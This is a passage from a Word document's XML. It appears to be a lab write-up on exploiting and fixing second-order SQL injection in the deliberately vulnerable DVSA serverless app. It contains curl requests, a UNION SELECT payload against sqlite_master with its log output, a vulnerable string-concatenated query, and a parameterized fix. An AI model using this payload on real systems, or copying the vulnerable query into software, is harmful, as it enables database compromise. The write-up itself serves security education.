    <w:p w14:paraId="53B206D9" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  \"data\": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD9D74" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">    \"address\": \"123 Hacker Way\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E5730" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">    \"email\": \"hacker@example.com\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5073A394" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">    \"name\": \"SQL Injector\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F57481E" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20ABC4" w14:textId="08105521" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>}" | jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B009FF" w14:textId="759E8C75" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>Step 4 — Trigger billing and cart-total calculation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC203E" w14:textId="5E7F4A8E" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>Finally, I submitted the billing request. This caused the backend workflow to calculate the cart total using the previously stored item data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D9B27" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>curl -s -X POST "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E15FC96" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>-H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C87E307" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>-H "Authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341D69E5" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>--data-raw "{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677454D3" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  \"action\": \"billing\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E70C4C" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  \"order-id\": \"$ORDER_ID\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECFC428" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  \"data\": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A518CE" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">    \"ccn\": \"4242424242424242\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB594B7" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">    \"exp\": \"11/25\",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04171051" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">    \"cvv\": \"123\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D9B31E" w14:textId="77777777" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1F8F6C" w14:textId="545C12B6" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>}" | jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F5A370" w14:textId="6B46A3E2" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>Step 5 — Check CloudWatch logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEF1DBA" w14:textId="100A1828" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>To verify the exploit, I opened AWS CloudWatch and checked the log group:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D354E6" w14:textId="6E4D5E2A" w:rsidR="00932450" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>/aws/lambda/DVSA-GET-CART-TOTAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09E3F9" w14:textId="516CAFA1" w:rsidR="00BA72A1" w:rsidRDefault="00932450" w:rsidP="00932450">
      <w:r>
        <w:t>The latest log stream showed that the injected item value reached the cart-total Lambda and influenced the backend SQL query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162D43A9" w14:textId="2AB40063" w:rsidR="007B2AE4" w:rsidRPr="007B2AE4" w:rsidRDefault="00BA72A1" w:rsidP="007B2AE4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Evidence and Proof</w:t>
      </w:r>
      <w:r w:rsidR="007B2AE4" w:rsidRPr="007B2AE4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204D617" w14:textId="567F8F82" w:rsidR="007B2AE4" w:rsidRPr="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r w:rsidRPr="007B2AE4">
        <w:t>The vulnerability was confirmed using CloudWatch logs from the Lambda function responsible for calculating the cart total. The relevant log group was:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB293A7" w14:textId="76B15B3F" w:rsidR="007B2AE4" w:rsidRPr="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r w:rsidRPr="007B2AE4">
        <w:t>/aws/lambda/DVSA-GET-CART-TOTAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785037E9" w14:textId="0D0664BE" w:rsidR="007B2AE4" w:rsidRPr="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r w:rsidRPr="007B2AE4">
        <w:t>The CloudWatch logs showed the injected cart item value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D61CEB" w14:textId="49539362" w:rsidR="007B2AE4" w:rsidRPr="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r w:rsidRPr="007B2AE4">
        <w:t>1 UNION SELECT 1, GROUP_CONCAT(name), 0 FROM sqlite_master WHERE type='table'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585A1573" w14:textId="2649DF95" w:rsidR="007B2AE4" w:rsidRPr="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r w:rsidRPr="007B2AE4">
        <w:t>The logs also showed the following result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C7ADE" w14:textId="7B132DD1" w:rsidR="007B2AE4" w:rsidRPr="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r w:rsidRPr="007B2AE4">
        <w:t>Found item: 1. Price: inventory, Quantity: 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF09048" w14:textId="29D1B133" w:rsidR="007B2AE4" w:rsidRPr="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r w:rsidRPr="007B2AE4">
        <w:t>This proves that the malicious item identifier was not treated only as plain data. Instead, it influenced the SQL query used by the cart-total calculation function. The value "inventory" came from SQLite metadata, which means the injected SQL affected the backend query result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BB588" w14:textId="5ADC04B4" w:rsidR="007B2AE4" w:rsidRPr="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r w:rsidRPr="007B2AE4">
        <w:t>The Lambda later produced a TypeError because the returned data structure did not match the expected cart format. However, that crash is not the main vulnerability. The main proof is that the SQL injection payload changed the query behavior before the crash occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D899151" w14:textId="3F61F908" w:rsidR="00BA72A1" w:rsidRDefault="00400D29" w:rsidP="00BA72A1">
      <w:r w:rsidRPr="00400D29">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C9B76F5" wp14:editId="51E7B44D">
            <wp:extent cx="5731510" cy="2947670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="106387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73827" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2947670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6A7E26" w14:textId="17ADA16A" w:rsidR="00400D29" w:rsidRDefault="00400D29" w:rsidP="00BA72A1">
      <w:r w:rsidRPr="00400D29">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B160B90" wp14:editId="6DC508C4">
            <wp:extent cx="5731510" cy="1971675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="151644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49634" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1971675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A51DA36" w14:textId="1919C8A1" w:rsidR="0043544F" w:rsidRDefault="0043544F" w:rsidP="00BA72A1">
      <w:r w:rsidRPr="0043544F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D328003" wp14:editId="669639B1">
            <wp:extent cx="5731510" cy="3382010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="178757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74636" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3382010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD7068" w14:textId="6C87B82F" w:rsidR="00BA72A1" w:rsidRDefault="0043544F" w:rsidP="007B2AE4">
      <w:r w:rsidRPr="0043544F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B2A998" wp14:editId="7257CBD0">
            <wp:extent cx="5731510" cy="2816225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="77243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32910" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2816225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36808C12" w14:textId="69F6349B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F35194" w14:textId="02724B00" w:rsidR="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r>
        <w:t>The fix should be applied in the backend Lambda function that calculates cart totals, specifically DVSA-GET-CART-TOTAL. The main security improvement is to prevent stored user-controlled cart item values from being concatenated into SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8C245" w14:textId="75B3F03A" w:rsidR="007B2AE4" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r>
        <w:t>The mitigation should include three changes. First, cart item identifiers must be validated before they are stored or processed. Only expected numeric product IDs should be accepted. Second, the SQL query used to retrieve item prices must be parameterized so the item ID is treated as data rather than executable SQL. Third, the function should fail safely by returning a controlled error message when invalid item data is detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C5CEC" w14:textId="1313C7E1" w:rsidR="00BA72A1" w:rsidRDefault="007B2AE4" w:rsidP="007B2AE4">
      <w:r>
        <w:t>This fix addresses the root cause because the injected payload can no longer change the SQL query structure during the later billing/cart-total stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6796CFD0" w14:textId="3F83F2C2" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41488051" w14:textId="6192BF81" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>The vulnerable pattern is in the cart-total calculation logic. The insecure behavior occurs when a stored item identifier is inserted directly into a SQL query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322347B" w14:textId="55C998AB" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>Vulnerable pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120741F9" w14:textId="31F2CC09" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>query = "SELECT itemId, price FROM inventory WHERE itemId = " + item_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7A9745" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>This is unsafe because item_id comes from stored order data that may have originally been controlled by the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A0A2E" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF"/>
    <w:p w14:paraId="3B46AA8C" w14:textId="4E253F3C" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Secure replacement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DF059F" w14:textId="05F7C8E0" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE757EF" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>def is_valid_item_id(item_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F07365A" w14:textId="0DE1F851" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">    return re.fullmatch(r"[0-9]+", str(item_id)) is not None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD1BBA" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>for item in items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD59F5" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">    item_id = item.get("itemId")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548CF1C" w14:textId="31000515" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">    quantity = item.get("quantity")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E283C" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">    if not is_valid_item_id(item_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9A4F13" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">        print("Rejected invalid item id:", item_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D87E78" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">        return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A789104" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">            "status": "err",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6034F9" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">            "msg": "Invalid cart item"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A047095" w14:textId="68CFBF4F" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775FED07" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">    if not isinstance(quantity, int) or quantity &lt;= 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36150AC6" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">        return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B10B0" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">            "status": "err",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC2A12" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">            "msg": "Invalid quantity"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A456BFE" w14:textId="04EB1AE3" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544CEBE1" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">    cursor.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601F347" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">        "SELECT itemId, price FROM inventory WHERE itemId = ?",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DEAAC8" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">        (item_id,)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1D5CA" w14:textId="3CBE4F83" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CDD50A" w14:textId="6BFD212A" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">    reult = cursor.fetchone()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525A51C9" w14:textId="68EE3A85" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>The key changes are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E006927" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>1. Item IDs are validated using an allowlist format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CEF4E8" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>2. Only numeric item IDs are accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9625F3" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>3. The SQL query uses a parameterized placeholder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213AA190" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>4. Invalid cart items are rejected before reaching the database query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92FFAA" w14:textId="164800AC" w:rsidR="00BA72A1" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5. The function returns a safe error instead of continuing with unsafe data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8A6F8" w14:textId="3340FA1F" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7439D979" w14:textId="32E34830" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>After applying the fix, I repeated the same exploit using the same malicious cart item value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AFD5FB" w14:textId="54553154" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>1 UNION SELECT 1, GROUP_CONCAT(name), 0 FROM sqlite_master WHERE type='table'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8394A3" w14:textId="63523FD3" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>The expected post-fix result is that the request is rejected with an error such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEA3325" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B8DBA6" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">  "status": "err",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF348A" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">  "msg": "Invalid cart item"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C8BFE" w14:textId="65677976" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68558E6E" w14:textId="4DAB8EB7" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>CloudWatch should no longer show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586DD262" w14:textId="498EDD12" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>Found item: 1. Price: inventory, Quantity: 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B31224B" w14:textId="08C3C62C" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>Instead, CloudWatch should show that the invalid item ID was rejected before query execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5CD53" w14:textId="59963629" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>To make sure the fix did not break normal behavior, I also tested a normal cart using a valid item ID such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B02BA73" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B7AAB1" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">  "action": "new",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C04C4" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">  "cart-id": "normal-cart-001",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFC371" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">  "items": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529CA27" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">    "1": 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3CF6A2" w14:textId="77777777" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A9774" w14:textId="72A8BB3A" w:rsidR="005C68CF" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777756C2" w14:textId="4E239555" w:rsidR="00BA72A1" w:rsidRDefault="005C68CF" w:rsidP="005C68CF">
      <w:r>
        <w:t>The normal order should still proceed through order creation, shipping, and billing successfully. This confirms that the fix blocks malicious input while preserving the intended cart-total workflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0E760" w14:textId="1CD8C2F4" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Structured Operation and Security Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187C3821" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="2DB8D432" w14:textId="2CFC7F12"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sidRPr="00D84B64">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
